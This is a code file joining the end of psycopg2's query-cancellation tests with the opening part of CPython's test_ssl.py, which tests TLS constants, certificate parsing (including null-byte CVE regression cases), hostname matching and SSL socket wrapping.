# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import time
import threading
import psycopg2
import psycopg2.extensions
from psycopg2 import extras
from .testconfig import dsn
from .testutils import unittest, ConnectingTestCase, skip_before_postgres, slow
class CancelTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
cur = self.conn.cursor()
cur.execute(
"""
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)"""
)
self.conn.commit()
def test_empty_cancel(self):
self.conn.cancel()
@slow
@skip_before_postgres(8, 2)
def test_cancel(self):
errors = []
def neverending(conn):
cur = conn.cursor()
try:
self.assertRaises(
psycopg2.extensions.QueryCanceledError,
cur.execute,
"select pg_sleep(60)",
)
# make sure the connection still works
conn.rollback()
cur.execute("select 1")
self.assertEqual(cur.fetchall(), [(1,)])
except Exception as e:
errors.append(e)
raise
def canceller(conn):
cur = conn.cursor()
try:
conn.cancel()
except Exception as e:
errors.append(e)
raise
del cur
thread1 = threading.Thread(target=neverending, args=(self.conn,))
# wait a bit to make sure that the other thread is already in
# pg_sleep -- ugly and racy, but the chances are ridiculously low
thread2 = threading.Timer(0.3, canceller, args=(self.conn,))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
self.assertEqual(errors, [])
@slow
@skip_before_postgres(8, 2)
def test_async_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
self.assertRaises(psycopg2.OperationalError, async_conn.cancel)
extras.wait_select(async_conn)
cur = async_conn.cursor()
cur.execute("select pg_sleep(10)")
time.sleep(1)
self.assertTrue(async_conn.isexecuting())
async_conn.cancel()
self.assertRaises(
psycopg2.extensions.QueryCanceledError, extras.wait_select, async_conn
)
cur.execute("select 1")
extras.wait_select(async_conn)
self.assertEqual(cur.fetchall(), [(1,)])
def test_async_connection_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
async_conn.close()
self.assertTrue(async_conn.closed)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import socket_helper
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext()
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
requires_minimum_version = unittest.skipUnless(
hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL >= 1.1.0g"
)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
support.wait_process(pid, exitcode=0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
        # wildcard in first fragment and IDNA A-labels in subsequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
